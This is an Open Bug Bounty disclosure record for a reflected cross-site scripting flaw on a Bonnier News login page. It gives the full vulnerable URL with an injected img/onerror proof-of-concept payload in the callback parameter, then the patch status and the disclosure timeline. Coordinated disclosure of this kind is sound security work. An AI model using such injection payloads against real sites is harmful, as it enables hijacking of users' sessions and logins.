account.bonnier.news XSS vulnerability

2016-06-13T16:26:00
ID OBB:159083
Type openbugbounty
Reporter hackingforbeer
Modified 2018-01-14T05:09:00

Description

Vulnerable URL:
https://account.bonnier.news/bip/login?appId=dagensnyheter.se&lc=sv&state=d8b87dc2-9ab2-4c7c-9d63-ba1853495f29&callback=https://auth.dn.se/security/bip-authenticated%22/%3E%3Cimg%20src=x%20onerror=prompt%28/OPENBUGBOUNTY/%29%3E&reqId=0V0CEVazFqIzMjfvk7U9d3

Details:

Description| Value
---|---
Patched:| Yes, on 13.01.2018
Latest check for patch:| 13.01.2018 13:53 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank:| Unknown / Not calculated
VIP website status:| No
account.bonnier.news SSL connection:| Grade: A

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 13 June, 2016 16:26 GMT
Generic security notifications sent to website owner| 13 June, 2016 16:28 GMT
Customized security notification sent to website owner| 13 June, 2016 16:28 GMT
Vulnerability details disclosed by researcher| 5 September, 2016 17:12 GMT
Vulnerability patched by the website owner| 14 January, 2018 05:09 GMT